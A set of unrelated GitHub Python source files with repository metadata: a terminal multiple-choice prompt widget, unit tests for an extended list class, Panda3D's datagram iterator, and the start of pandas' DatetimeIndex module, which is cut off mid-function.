text = cursor + selected + choice
else:
text = cursor + unselected + choice
colormap = [active for _ in text]
render = (text, colormap)
else:
if is_checked:
text = blanks + selected + choice
colormap = [active for _ in text]
else:
text = blanks + unselected + choice
colormap = [inactive for _ in text]
render = (text, colormap)
render_list.append(render)
return render_list
def reset(self):
super().reset()
reset_choices = []
for c, _ in self.choices:
reset_choices.append(c, False)
self.choices = reset_choices
def _main(self):
super()._main()
self.result = [ch for ch, s in self.choices if s]
def _handle_events(self):
evt = self.pull_events()[0]
if evt["Type"] == self.cli.event("Key"):
k = evt["Key"]
if k == self.cli.key("Enter"):
self.end_signal = True
elif k == self.cli.key("ArrowUp"):
if self.cursor_index > self.PADDING:
self.cursor_index -= 1
self.choice_index -= 1
elif self.choice_index > self.PADDING:
self.choice_index -= 1
elif self.choice_index <= self.PADDING:
if self.choice_index > 0:
self.choice_index -= 1
self.cursor_index -= 1
else:
self.cursor_index = 0
elif k == self.cli.key("ArrowDown"):
if self.cursor_index < self.PADDING:
self.cursor_index += 1
self.choice_index += 1
elif self.choice_index < self.BOTTOM - self.PADDING:
if self.overflow:
self.cursor_index += 1
self.choice_index += 1
elif self.choice_index >= self.BOTTOM - self.PADDING:
if self.choice_index < self.BOTTOM:
self.choice_index += 1
self.cursor_index += 1
else:
self.choice_index = self.BOTTOM
elif k == self.cli.key("ArrowRight"):
choice, _ = self.choices[self.choice_index]
self.choices[self.choice_index] = (choice, True)
elif k == self.cli.key("ArrowLeft"):
choice, _ = self.choices[self.choice_index]
self.choices[self.choice_index] = (choice, False)
elif k == self.cli.key("Space"):
choice, marked = self.choices[self.choice_index]
self.choices[self.choice_index] = (choice, not marked)
else:
pass
elif evt["Type"] == self.cli.event("Error"):
# EventError
raise(Exception(evt["Err"]))
return None
|
{
"content_hash": "df7cfd9d18c01649023870df7cfb7971",
"timestamp": "",
"source": "github",
"line_count": 300,
"max_line_length": 79,
"avg_line_length": 37.526666666666664,
"alnum_prop": 0.4834784153490851,
"repo_name": "imdaveho/impromptu",
"id": "18945c05d67cedadf4dc76c875e30b5d440afe38",
"size": "11268",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "impromptu/fields/_choices.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "54608"
}
],
"symlink_target": ""
}
|
from extList import extList
import unittest # built in unit test tool
# TESTS
#testing creating extlist
class CreateExtlistTests(unittest.TestCase):
#setup list for testing
def setUp(self):
#create list
self.aList = extList()
def test_CreateExtlist(self):
#assert
self.assertTrue(isinstance(self.aList, extList))
def test_CreateExtListThenAdd(self):
#append to list
self.aList.extend([1, 2, 3])
#create compare list
compList = [1, 2, 3]
#assert
self.assertEqual([self.aList[i] == compList[i] for i in range(0, 3)], [True, True, True])
def test_CreateExtListWithDefault(self):
#create list with default parameter
self.aList = extList([1, 2, 3])
#create copmapre list
compList = [1, 2, 3]
#assert
self.assertEqual([self.aList[i] == compList[i] for i in range(0, 3)], [True, True, True])
#testing basic operations
class BasicOpsTests(unittest.TestCase):
#setup list for testing
def setUp(self):
#create list
self.aList = extList(["cheeki", "breeki"])
def test_ConvertToNone(self):
#create list and set each item to none
self.aList.toNone()
#create compare list
compList = extList([None, None])
#assert
self.assertEqual(self.aList, compList)
def test_ClearList(self):
#remove all itmes from list
self.aList.clear()
#assert
self.assertEqual(len(self.aList), 0)
def test_ChopListInHalf(self):
#chop list in half
self.aList.chop(1)
#create compare list
compList = extList([["cheeki"], ["breeki"]])
#assert
self.assertEqual(self.aList, compList)
def test_RemoveItemBysType(self):
#create list and remove type int
self.aList = extList([1, 2, 3.0, "4", [5]])
self.aList.remType(int)
#create compare list
compList = extList([3.0, "4", [5]])
#assert
self.assertEqual(self.aList, compList)
def test_RemoveDuplicateItem(self):
#add duplicated to list
self.aList.extend(self.aList)
self.aList.remDupl()
#create compare lists
c1 = ["cheeki", "breeki"]
c2 = ["breeki", "cheeki"]
#assert
self.assertEqual(len(self.aList), 2)
self.assertTrue(self.aList == c1 or self.aList == c2)
#type conversion
class TypeConversionTests(unittest.TestCase):
def test_ConvertArrayItemTypes(self):
#create list and convert to int
aList = extList([1, "2", 3.0])
aList.type(int)
#create compare list
compList = extList([1, 2, 3])
#assert
self.assertEqual(aList, compList)
#convert to float
aList.type(float)
#create compare list
compList = extList([1.0, 2.0, 3.0])
#assert
self.assertEqual(aList, compList)
#convert to string
aList.type(str)
#create compare list
compList = extList(["1.0", "2.0", "3.0"])
#assert
self.assertEqual(aList, compList)
#math operations
class MathOperationsTests(unittest.TestCase):
#setup list for testing
def setUp(self):
#create list
self.aList = extList([2, 4, 6])
def test_MultiplyArray(self):
#multiply
self.aList.multiply(3).multiply(1)
#create compare array
compList = extList([6, 12, 18])
#assert
self.assertEqual(self.aList, compList)
def test_DivideByMultiplyingArray(self):
#multiply by 1/2
self.aList.multiply(0.5)
#create compare array
compList = extList([1, 2, 3])
#assert
self.assertEqual(self.aList, compList)
def test_AddToArray(self):
#create list and add
self.aList.add(1).add(1)
#create compare array
compList = extList([4, 6, 8])
#assert
self.assertEqual(self.aList, compList)
def test_SubtractByAdding(self):
#add negative numberself.
self.aList.add(-1)
#create compare array
compList = extList([1, 3, 5])
#assert
self.assertEqual(self.aList, compList)
def test_AddExtList(self):
#create second extlist and add to self.aList
nList = extList([1, 2, 3])
self.aList.addExtlist(nList)
#create compare array
compList = extList([3, 6, 9])
#assert
self.assertEqual(self.aList, compList)
def test_AddExtListNegative(self):
#create second extList and add to self.aList
nList = extList([-1, -2, -3])
self.aList.addExtlist(nList)
#create compare array
compList = extList([1, 2, 3])
#assert
self.assertEqual(self.aList, compList)
#run tests
if __name__ == "__main__":
unittest.main()
|
{
"content_hash": "c87d1af1ee930c275a190f5beadf0aa5",
"timestamp": "",
"source": "github",
"line_count": 223,
"max_line_length": 91,
"avg_line_length": 18.982062780269057,
"alnum_prop": 0.6832034018426648,
"repo_name": "bendacoder/extList.py",
"id": "16664157b270be6a751a1a66db346d11d9e6331b",
"size": "4310",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test_extList.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "11001"
}
],
"symlink_target": ""
}
|
from panda3d.core import *
from panda3d.direct import *
# Import the type numbers
class PyDatagramIterator(DatagramIterator):
# This is a little helper Dict to replace the huge <if> statement
# for trying to match up datagram subatomic types with add funtions
# If Python had an O(1) "case" statement we would use that instead
FuncDict = {
STInt8: DatagramIterator.getInt8,
STInt16: DatagramIterator.getInt16,
STInt32: DatagramIterator.getInt32,
STInt64: DatagramIterator.getInt64,
STUint8: DatagramIterator.getUint8,
STUint16: DatagramIterator.getUint16,
STUint32: DatagramIterator.getUint32,
STUint64: DatagramIterator.getUint64,
STFloat64: DatagramIterator.getFloat64,
STString: DatagramIterator.getString,
STBlob: DatagramIterator.getString,
STBlob32: DatagramIterator.getString32,
}
getChannel = DatagramIterator.getUint64
def getArg(self, subatomicType, divisor=1):
# Import the type numbers
if divisor == 1:
# See if it is in the handy dict
getFunc = self.FuncDict.get(subatomicType)
if getFunc:
retVal = getFunc(self)
# No division necessary
elif subatomicType == STInt8array:
len = self.getUint16()
retVal = []
for i in range(len):
retVal.append(self.getInt8())
elif subatomicType == STInt16array:
len = self.getUint16() >> 1
retVal = []
for i in range(len):
retVal.append(self.getInt16())
elif subatomicType == STInt32array:
len = self.getUint16() >> 2
retVal = []
for i in range(len):
retVal.append(self.getInt32())
elif subatomicType == STUint8array:
len = self.getUint16()
retVal = []
for i in range(len):
retVal.append(self.getUint8())
elif subatomicType == STUint16array:
len = self.getUint16() >> 1
retVal = []
for i in range(len):
retVal.append(self.getUint16())
elif subatomicType == STUint32array:
len = self.getUint16() >> 2
retVal = []
for i in range(len):
retVal.append(self.getUint32())
elif subatomicType == STUint32uint8array:
len = self.getUint16() / 5
retVal = []
for i in range(len):
a = self.getUint32()
b = self.getUint8()
retVal.append((a, b))
else:
raise Exception("Error: No such type as: " + str(subAtomicType))
else:
# See if it is in the handy dict
getFunc = self.FuncDict.get(subatomicType)
if getFunc:
retVal = (getFunc(self)/float(divisor))
elif subatomicType == STInt8array:
len = self.getUint8() >> 1
retVal = []
for i in range(len):
retVal.append(self.getInt8()/float(divisor))
elif subatomicType == STInt16array:
len = self.getUint16() >> 1
retVal = []
for i in range(len):
retVal.append(self.getInt16()/float(divisor))
elif subatomicType == STInt32array:
len = self.getUint16() >> 2
retVal = []
for i in range(len):
retVal.append(self.getInt32()/float(divisor))
elif subatomicType == STUint8array:
len = self.getUint8() >> 1
retVal = []
for i in range(len):
retVal.append(self.getUint8()/float(divisor))
elif subatomicType == STUint16array:
len = self.getUint16() >> 1
retVal = []
for i in range(len):
retVal.append(self.getUint16()/float(divisor))
elif subatomicType == STUint32array:
len = self.getUint16() >> 2
retVal = []
for i in range(len):
retVal.append(self.getUint32()/float(divisor))
elif subatomicType == STUint32uint8array:
len = self.getUint16() / 5
retVal = []
for i in range(len):
a = self.getUint32()
b = self.getUint8()
retVal.append((a / float(divisor), b / float(divisor)))
else:
raise Exception("Error: No such type as: " + str(subatomicType))
return retVal
|
{
"content_hash": "34a050db1ecda1c044d4304c45e9c941",
"timestamp": "",
"source": "github",
"line_count": 123,
"max_line_length": 80,
"avg_line_length": 39.552845528455286,
"alnum_prop": 0.5075025693730729,
"repo_name": "brakhane/panda3d",
"id": "e97600f6b4c94fd44330b6b23242641078dd6ac0",
"size": "5082",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "direct/src/distributed/PyDatagramIterator.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "4004"
},
{
"name": "C",
"bytes": "6395016"
},
{
"name": "C++",
"bytes": "31193551"
},
{
"name": "Emacs Lisp",
"bytes": "166274"
},
{
"name": "Groff",
"bytes": "3106"
},
{
"name": "HTML",
"bytes": "8081"
},
{
"name": "Java",
"bytes": "3777"
},
{
"name": "JavaScript",
"bytes": "7003"
},
{
"name": "Logos",
"bytes": "5504"
},
{
"name": "MAXScript",
"bytes": "1745"
},
{
"name": "NSIS",
"bytes": "91955"
},
{
"name": "Nemerle",
"bytes": "4403"
},
{
"name": "Objective-C",
"bytes": "30065"
},
{
"name": "Objective-C++",
"bytes": "300394"
},
{
"name": "Perl",
"bytes": "206982"
},
{
"name": "Perl6",
"bytes": "30636"
},
{
"name": "Puppet",
"bytes": "2627"
},
{
"name": "Python",
"bytes": "5530601"
},
{
"name": "Rebol",
"bytes": "421"
},
{
"name": "Shell",
"bytes": "55940"
},
{
"name": "Visual Basic",
"bytes": "136"
}
],
"symlink_target": ""
}
|
from __future__ import division
import operator
import warnings
from datetime import time, datetime
from datetime import timedelta
import numpy as np
from pandas.core.base import _shared_docs
from pandas.types.common import (_NS_DTYPE, _INT64_DTYPE,
is_object_dtype, is_datetime64_dtype,
is_datetimetz, is_dtype_equal,
is_integer, is_float,
is_integer_dtype,
is_datetime64_ns_dtype,
is_period_dtype,
is_bool_dtype,
is_string_dtype,
is_list_like,
is_scalar,
pandas_dtype,
_ensure_int64)
from pandas.types.generic import ABCSeries
from pandas.types.dtypes import DatetimeTZDtype
from pandas.types.missing import isnull
import pandas.types.concat as _concat
from pandas.core.common import (_values_from_object, _maybe_box,
PerformanceWarning)
from pandas.core.index import Index, Int64Index, Float64Index
from pandas.indexes.base import _index_shared_docs
import pandas.compat as compat
from pandas.tseries.frequencies import (
to_offset, get_period_alias,
Resolution)
from pandas.tseries.base import DatelikeOps, TimelikeOps, DatetimeIndexOpsMixin
from pandas.tseries.offsets import DateOffset, generate_range, Tick, CDay
from pandas.tseries.tools import parse_time_string, normalize_date, to_time
from pandas.tseries.timedeltas import to_timedelta
from pandas.util.decorators import (Appender, cache_readonly,
deprecate_kwarg, Substitution)
import pandas.core.common as com
import pandas.tseries.offsets as offsets
import pandas.tseries.tools as tools
from pandas.lib import Timestamp
import pandas.lib as lib
import pandas.tslib as tslib
import pandas._period as period
import pandas._join as _join
import pandas.algos as _algos
import pandas.index as _index
def _utc():
import pytz
return pytz.utc
# -------- some conversion wrapper functions
def _field_accessor(name, field, docstring=None):
def f(self):
values = self.asi8
if self.tz is not None:
utc = _utc()
if self.tz is not utc:
values = self._local_timestamps()
if field in ['is_month_start', 'is_month_end',
'is_quarter_start', 'is_quarter_end',
'is_year_start', 'is_year_end']:
month_kw = (self.freq.kwds.get('startingMonth',
self.freq.kwds.get('month', 12))
if self.freq else 12)
result = tslib.get_start_end_field(values, field, self.freqstr,
month_kw)
elif field in ['weekday_name']:
result = tslib.get_date_name_field(values, field)
return self._maybe_mask_results(result)
elif field in ['is_leap_year']:
# no need to mask NaT
return tslib.get_date_field(values, field)
else:
result = tslib.get_date_field(values, field)
return self._maybe_mask_results(result, convert='float64')
f.__name__ = name
f.__doc__ = docstring
return property(f)
def _dt_index_cmp(opname, nat_result=False):
"""
Wrap comparison operations to convert datetime-like to datetime64
"""
def wrapper(self, other):
func = getattr(super(DatetimeIndex, self), opname)
if (isinstance(other, datetime) or
isinstance(other, compat.string_types)):
other = _to_m8(other, tz=self.tz)
result = func(other)
if isnull(other):
result.fill(nat_result)
else:
if isinstance(other, list):
other = DatetimeIndex(other)
elif not isinstance(other, (np.ndarray, Index, ABCSeries)):
other = _ensure_datetime64(other)
result = func(np.asarray(other))
result = _values_from_object(result)
if isinstance(other, Index):
o_mask = other.values.view('i8') == tslib.iNaT
else:
o_mask = other.view('i8') == tslib.iNaT
if o_mask.any():
result[o_mask] = nat_result
if self.hasnans:
result[self._isnan] = nat_result
# support of bool dtype indexers
if is_bool_dtype(result):
return result
return Index(result)
return wrapper
def _ensure_datetime64(other):
if isinstance(other, np.datetime64):
return other
raise TypeError('%s type object %s' % (type(other), str(other)))
_midnight = time(0, 0)
def _new_DatetimeIndex(cls, d):
""" This is called upon unpickling, rather than the default which doesn't
have arguments and breaks __new__ """
# data are already in UTC
# so need to localize
tz = d.pop('tz', None)
result = cls.__new__(cls, verify_integrity=False, **d)
if tz is not None:
result = result.tz_localize('UTC').tz_convert(tz)
return result
class DatetimeIndex(DatelikeOps, TimelikeOps, DatetimeIndexOpsMixin,
Int64Index):
"""
Immutable ndarray of datetime64 data, represented internally as int64, and
which can be boxed to Timestamp objects that are subclasses of datetime and
carry metadata such as frequency information.
Parameters
----------
data : array-like (1-dimensional), optional
Optional datetime-like data to construct index with
copy : bool
Make a copy of input ndarray
freq : string or pandas offset object, optional
One of pandas date offset strings or corresponding objects
start : starting value, datetime-like, optional
If data is None, start is used as the start point in generating regular
timestamp data.
periods : int, optional, > 0
Number of periods to generate, if generating index. Takes precedence
over end argument
end : end time, datetime-like, optional
If periods is none, generated index will extend to first conforming
time on or just past end argument
closed : string or None, default None
Make the interval closed with respect to the given frequency to
the 'left', 'right', or both sides (None)
tz : pytz.timezone or dateutil.tz.tzfile
ambiguous : 'infer', bool-ndarray, 'NaT', default 'raise'
- 'infer' will attempt to infer fall dst-transition hours based on
order
- bool-ndarray where True signifies a DST time, False signifies a
non-DST time (note that this flag is only applicable for ambiguous
times)
- 'NaT' will return NaT where there are ambiguous times
- 'raise' will raise an AmbiguousTimeError if there are ambiguous times
infer_dst : boolean, default False (DEPRECATED)
Attempt to infer fall dst-transition hours based on order
name : object
Name to be stored in the index
Notes
-----
To learn more about the frequency strings, please see `this link
<http://pandas.pydata.org/pandas-docs/stable/timeseries.html#offset-aliases>`__.
"""
_typ = 'datetimeindex'
_join_precedence = 10
def _join_i8_wrapper(joinf, **kwargs):
return DatetimeIndexOpsMixin._join_i8_wrapper(joinf, dtype='M8[ns]',
**kwargs)
_inner_indexer = _join_i8_wrapper(_join.inner_join_indexer_int64)
_outer_indexer = _join_i8_wrapper(_join.outer_join_indexer_int64)
_left_indexer = _join_i8_wrapper(_join.left_join_indexer_int64)
_left_indexer_unique = _join_i8_wrapper(
_join.left_join_indexer_unique_int64, with_indexers=False)
_arrmap = None
__eq__ = _dt_index_cmp('__eq__')
__ne__ = _dt_index_cmp('__ne__', nat_result=True)
__lt__ = _dt_index_cmp('__lt__')
__gt__ = _dt_index_cmp('__gt__')
__le__ = _dt_index_cmp('__le__')
__ge__ = _dt_index_cmp('__ge__')
_engine_type = _index.DatetimeEngine
tz = None
offset = None
_comparables = ['name', 'freqstr', 'tz']
_attributes = ['name', 'freq', 'tz']
_datetimelike_ops = ['year', 'month', 'day', 'hour', 'minute', 'second',
'weekofyear', 'week', 'dayofweek', 'weekday',
'dayofyear', 'quarter', 'days_in_month',
'daysinmonth', 'date', 'time', 'microsecond',
'nanosecond', 'is_month_start', 'is_month_end',
'is_quarter_start', 'is_quarter_end', 'is_year_start',
'is_year_end', 'tz', 'freq', 'weekday_name',
'is_leap_year']
_is_numeric_dtype = False
_infer_as_myclass = True
@deprecate_kwarg(old_arg_name='infer_dst', new_arg_name='ambiguous',
mapping={True: 'infer', False: 'raise'})
def __new__(cls, data=None,
freq=None, start=None, end=None, periods=None,
copy=False, name=None, tz=None,
verify_integrity=True, normalize=False,
closed=None, ambiguous='raise', dtype=None, **kwargs):
# This allows to later ensure that the 'copy' parameter is honored:
if isinstance(data, Index):
ref_to_data = data._data
else:
ref_to_data = data
if name is None and hasattr(data, 'name'):
name = data.name
dayfirst = kwargs.pop('dayfirst', None)
yearfirst = kwargs.pop('yearfirst', None)
freq_infer = False
if not isinstance(freq, DateOffset):
# if a passed freq is None, don't infer automatically
if freq != 'infer':
freq = to_offset(freq)
else:
freq_infer = True
freq = None
if periods is not None:
if is_float(periods):
periods = int(periods)
elif not is_integer(periods):
raise ValueError('Periods must be a number, got %s' %
str(periods))
if data is None and freq is None:
raise ValueError("Must provide freq argument if no data is "
"supplied")
# if dtype has an embeded tz, capture it
if dtype is not None:
try:
dtype = DatetimeTZDtype.construct_from_string(dtype)
dtz = getattr(dtype, 'tz', None)
if dtz is not None:
if tz is not None and str(tz) != str(dtz):
raise ValueError("cannot supply both a tz and a dtype"
" with a tz")
tz = dtz
except TypeError:
pass
if data is None:
return cls._generate(start, end, periods, name, freq,
tz=tz, normalize=normalize, closed=closed,
ambiguous=ambiguous)
if not isinstance(data, (np.ndarray, Index, ABCSeries)):
if is_scalar(data):
raise ValueError('DatetimeIndex() must be called with a '
'collection of some kind, %s was passed'
% repr(data))
# other iterable of some kind
if not isinstance(data, (list, tuple)):
data = list(data)
data = np.asarray(data, dtype='O')
elif isinstance(data, ABCSeries):
data = data._values
# data must be Index or np.ndarray here
if not (is_datetime64_dtype(data) or is_datetimetz(data) or
is_integer_dtype(data)):
data = tools.to_datetime(data, dayfirst=dayfirst,
yearfirst=yearfirst)
if issubclass(data.dtype.type, np.datetime64) or is_datetimetz(data):
if isinstance(data, DatetimeIndex):
if tz is None:
tz = data.tz
elif data.tz is None:
data = data.tz_localize(tz, ambiguous=ambiguous)
else:
# the tz's must match
if str(tz) != str(data.tz):
msg = ('data is already tz-aware {0}, unable to '
'set specified tz: {1}')
raise TypeError(msg.format(data.tz, tz))
subarr = data.values
if freq is None:
freq = data.offset
verify_integrity = False
else:
if data.dtype != _NS_DTYPE:
subarr = tslib.cast_to_nanoseconds(data)
else:
subarr = data
else:
# must be integer dtype otherwise
if isinstance(data, Int64Index):
raise TypeError('cannot convert Int64Index->DatetimeIndex')
if data.dtype != _INT64_DTYPE:
data = data.astype(np.int64)
subarr = data.view(_NS_DTYPE)
if isinstance(subarr, DatetimeIndex):
if tz is None:
tz = subarr.tz
else:
if tz is not None:
tz = tslib.maybe_get_tz(tz)
if (not isinstance(data, DatetimeIndex) or
getattr(data, 'tz', None) is None):
# Convert tz-naive to UTC
ints = subarr.view('i8')
subarr = tslib.tz_localize_to_utc(ints, tz,
ambiguous=ambiguous)
subarr = subarr.view(_NS_DTYPE)
subarr = cls._simple_new(subarr, name=name, freq=freq, tz=tz)
if dtype is not None:
if not is_dtype_equal(subarr.dtype, dtype):
# dtype must be coerced to DatetimeTZDtype above
if subarr.tz is not None:
raise ValueError("cannot localize from non-UTC data")
if verify_integrity and len(subarr) > 0:
if freq is not None and not freq_infer:
inferred = subarr.inferred_freq
if inferred != freq.freqstr:
on_freq = cls._generate(subarr[0], None, len(subarr), None,
freq, tz=tz, ambiguous=ambiguous)
if not np.array_equal(subarr.asi8, on_freq.asi8):
raise ValueError('Inferred frequency {0} from passed '
'dates does not conform to passed '
'frequency {1}'
.format(inferred, freq.freqstr))
if freq_infer:
inferred = subarr.inferred_freq
if inferred:
subarr.offset = to_offset(inferred)
return subarr._deepcopy_if_needed(ref_to_data, copy)
@classmethod
def _generate(cls, start, end, periods, name, offset,
tz=None, normalize=False, ambiguous='raise', closed=None):
if com._count_not_none(start, end, periods) != 2:
raise ValueError('Must specify two of start, end, or periods')
_normalized = True
if start is not None:
start = Timestamp(start)
if end is not None:
end = Timestamp(end)
left_closed = False
right_closed = False
if start is None and end is None:
if closed is not None:
raise ValueError("Closed has to be None if not both of start"
"and end are defined")
if closed is None:
left_closed = True
right_closed = True
elif closed == "left":
left_closed = True
elif closed == "right":
right_closed = True
else:
raise ValueError("Closed has to be either 'left', 'right' or None")
try:
inferred_tz = tools._infer_tzinfo(start, end)
except:
raise TypeError('Start and end cannot both be tz-aware with '
'different timezones')
inferred_tz = tslib.maybe_get_tz(inferred_tz)
# these may need to be localized
tz = tslib.maybe_get_tz(tz)
if tz is not None:
date = start or end
if date.tzinfo is not None and hasattr(tz, 'localize'):
tz = tz.localize(date.replace(tzinfo=None)).tzinfo
if tz is not None and inferred_tz is not None:
if not tslib.get_timezone(inferred_tz) == tslib.get_timezone(tz):
raise AssertionError("Inferred time zone not equal to passed "
"time zone")
elif inferred_tz is not None:
tz = inferred_tz
if start is not None:
if normalize:
start = normalize_date(start)
_normalized = True
else:
_normalized = _normalized and start.time() == _midnight
if end is not None:
if normalize:
end = normalize_date(end)
_normalized = True
else:
_normalized = _normalized and end.time() == _midnight
if hasattr(offset, 'delta') and offset != offsets.Day():
if inferred_tz is None and tz is not None:
# naive dates
if start is not None and start.tz is None:
start = start.tz_localize(tz, ambiguous=False)
if end is not None and end.tz is None:
end = end.tz_localize(tz, ambiguous=False)
if start and end:
if start.tz is None and end.tz is not None:
start = start.tz_localize(end.tz, ambiguous=False)
if end.tz is None and start.tz is not None:
end = end.tz_localize(start.tz, ambiguous=False)
if _use_cached_range(offset, _normalized, start, end):
index = cls._cached_range(start, end, periods=periods,
offset=offset, name=name)
else:
index = _generate_regular_range(start, end, periods, offset)
else:
if tz is not None:
# naive dates
if start is not None and start.tz is not None:
start = start.replace(tzinfo=None)
if end is not None and end.tz is not None:
end = end.replace(tzinfo=None)
if start and end:
if start.tz is None and end.tz is not None:
end = end.replace(tzinfo=None)
if end.tz is None and start.tz is not None:
start = start.replace(tzinfo=None)
if _use_cached_range(offset, _normalized, start, end):
index = cls._cached_range(start, end, periods=periods,
offset=offset, name=name)
else:
index = _generate_regular_range(start, end, periods, offset)
if tz is not None and getattr(index, 'tz', None) is None:
index = tslib.tz_localize_to_utc(_ensure_int64(index), tz,
ambiguous=ambiguous)
index = index.view(_NS_DTYPE)
# index is localized datetime64 array -> have to convert
# start/end as well to compare
if start is not None:
start = start.tz_localize(tz).asm8
if end is not None:
end = end.tz_localize(tz).asm8
if not left_closed and len(index) and index[0] == start:
index = index[1:]
if not right_closed and len(index) and index[-1] == end:
index = index[:-1]
index = cls._simple_new(index, name=name, freq=offset, tz=tz)
return index
@property
def _box_func(self):
return lambda x: Timestamp(x, freq=self.offset, tz=self.tz)
def _convert_for_op(self, value):
""" Convert value to be insertable to ndarray """
if self._has_same_tz(value):
return _to_m8(value)
raise ValueError('Passed item and index have different timezone')
def _local_timestamps(self):
utc = _utc()
if self.is_monotonic:
return tslib.tz_convert(self.asi8, utc, self.tz)
else:
values = self.asi8
indexer = values.argsort()
result = tslib.tz_convert(values.take(indexer), utc, self.tz)
n = len(indexer)
reverse = np.empty(n, dtype=np.int_)
reverse.put(indexer, np.arange(n))
return result.take(reverse)
@classmethod
def _simple_new(cls, values, name=None, freq=None, tz=None,
dtype=None, **kwargs):
"""
we require the we have a dtype compat for the values
if we are passed a non-dtype compat, then coerce using the constructor
"""
if not getattr(values, 'dtype', None):
# empty, but with dtype compat
if values is None:
values = np.empty(0, dtype=_NS_DTYPE)
return cls(values, name=name, freq=freq, tz=tz,
dtype=dtype, **kwargs)
values = np.array(values, copy=False)
if is_object_dtype(values):
return cls(values, name=name, freq=freq, tz=tz,
dtype=dtype, **kwargs).values
elif not is_datetime64_dtype(values):
values = _ensure_int64(values).view(_NS_DTYPE)
result = object.__new__(cls)
result._data = values
result.name = name
result.offset = freq
result.tz = tslib.maybe_get_tz(tz)
result._reset_identity()
return result
@property
def tzinfo(self):
"""
Alias for tz attribute
"""
return self.tz
@cache_readonly
def _timezone(self):
""" Comparable timezone both for pytz / dateutil"""
return tslib.get_timezone(self.tzinfo)
def _has_same_tz(self, other):
zzone = self._timezone
# vzone sholdn't be None if value is non-datetime like
if isinstance(other, np.datetime64):
# convert to Timestamp as np.datetime64 doesn't have tz attr
other = Timestamp(other)
vzone = tslib.get_timezone(getattr(other, 'tzinfo', '__no_tz__'))
return zzone == vzone
@classmethod
def _cached_range(cls, start=None, end=None, periods=None, offset=None,
name=None):
if start is None and end is None:
# I somewhat believe this should never be raised externally and
# therefore should be a `PandasError` but whatever...
raise TypeError('Must specify either start or end.')
if start is not None:
start = Timestamp(start)
if end is not None:
end = Timestamp(end)
if (start is None or end is None) and periods is None:
raise TypeError(
'Must either specify period or provide both start and end.')
if offset is None:
# This can't happen with external-facing code, therefore
# PandasError
raise TypeError('Must provide offset.')
drc = _daterange_cache
if offset not in _daterange_cache:
xdr = generate_range(offset=offset, start=_CACHE_START,
end=_CACHE_END)
arr = tools.to_datetime(list(xdr), box=False)
cachedRange = DatetimeIndex._simple_new(arr)
cachedRange.offset = offset
cachedRange.tz = None
cachedRange.name = None
drc[offset] = cachedRange
else:
cachedRange = drc[offset]
if start is None:
if not isinstance(end, Timestamp):
raise AssertionError('end must be an instance of Timestamp')
end = offset.rollback(end)
endLoc = cachedRange.get_loc(end) + 1
startLoc = endLoc - periods
elif end is None:
if not isinstance(start, Timestamp):
raise AssertionError('start must be an instance of Timestamp')
start = offset.rollforward(start)
startLoc = cachedRange.get_loc(start)
endLoc = startLoc + periods
else:
if not offset.onOffset(start):
start = offset.rollforward(start)
if not offset.onOffset(end):
end = offset.rollback(end)
startLoc = cachedRange.get_loc(start)
endLoc = cachedRange.get_loc(end) + 1
indexSlice = cachedRange[startLoc:endLoc]
indexSlice.name = name
indexSlice.offset = offset
return indexSlice
def _mpl_repr(self):
# how to represent ourselves to matplotlib
return tslib.ints_to_pydatetime(self.asi8, self.tz)
@cache_readonly
def _is_dates_only(self):
from pandas.formats.format import _is_dates_only
return _is_dates_only(self.values)
@property
def _formatter_func(self):
from pandas.formats.format import _get_format_datetime64
formatter = _get_format_datetime64(is_dates_only=self._is_dates_only)
return lambda x: "'%s'" % formatter(x, tz=self.tz)
def __reduce__(self):
# we use a special reudce here because we need
# to simply set the .tz (and not reinterpret it)
d = dict(data=self._data)
d.update(self._get_attributes_dict())
return _new_DatetimeIndex, (self.__class__, d), None
def __setstate__(self, state):
"""Necessary for making this object picklable"""
if isinstance(state, dict):
super(DatetimeIndex, self).__setstate__(state)
elif isinstance(state, tuple):
# < 0.15 compat
if len(state) == 2:
nd_state, own_state = state
data = np.empty(nd_state[1], dtype=nd_state[2])
np.ndarray.__setstate__(data, nd_state)
self.name = own_state[0]
self.offset = own_state[1]
self.tz = own_state[2]
# provide numpy < 1.7 compat
if nd_state[2] == 'M8[us]':
new_state = np.ndarray.__reduce__(data.astype('M8[ns]'))
np.ndarray.__setstate__(data, new_state[2])
else: # pragma: no cover
data = np.empty(state)
np.ndarray.__setstate__(data, state)
self._data = data
self._reset_identity()
else:
raise Exception("invalid pickle state")
_unpickle_compat = __setstate__
def _add_datelike(self, other):
# adding a timedeltaindex to a datetimelike
if other is tslib.NaT:
return self._nat_new(box=True)
raise TypeError("cannot add a datelike to a DatetimeIndex")
def _sub_datelike(self, other):
# subtract a datetime from myself, yielding a TimedeltaIndex
from pandas import TimedeltaIndex
if isinstance(other, DatetimeIndex):
# require tz compat
if not self._has_same_tz(other):
raise TypeError("DatetimeIndex subtraction must have the same "
"timezones or no timezones")
result = self._sub_datelike_dti(other)
elif isinstance(other, (tslib.Timestamp, datetime)):
other = Timestamp(other)
if other is tslib.NaT:
result = self._nat_new(box=False)
# require tz compat
elif not self._has_same_tz(other):
raise TypeError("Timestamp subtraction must have the same "
"timezones or no timezones")
else:
i8 = self.asi8
result = i8 - other.value
result = self._maybe_mask_results(result,
fill_value=tslib.iNaT)
else:
raise TypeError("cannot subtract DatetimeIndex and {typ}"
.format(typ=type(other).__name__))
return TimedeltaIndex(result, name=self.name, copy=False)
def _sub_datelike_dti(self, other):
"""subtraction of two DatetimeIndexes"""
if not len(self) == len(other):
raise ValueError("cannot add indices of unequal length")
self_i8 = self.asi8
other_i8 = other.asi8
new_values = self_i8 - other_i8
if self.hasnans or other.hasnans:
mask = (self._isnan) | (other._isnan)
new_values[mask] = tslib.iNaT
return new_values.view('i8')
def _maybe_update_attributes(self, attrs):
""" Update Index attributes (e.g. freq) depending on op """
freq = attrs.get('freq', None)
if freq is not None:
# no need to infer if freq is None
attrs['freq'] = 'infer'
return attrs
def _add_delta(self, delta):
from pandas import TimedeltaIndex
name = self.name
if isinstance(delta, (Tick, timedelta, np.timedelta64)):
new_values = self._add_delta_td(delta)
elif isinstance(delta, TimedeltaIndex):
new_values = self._add_delta_tdi(delta)
# update name when delta is Index
name = com._maybe_match_name(self, delta)
elif isinstance(delta, DateOffset):
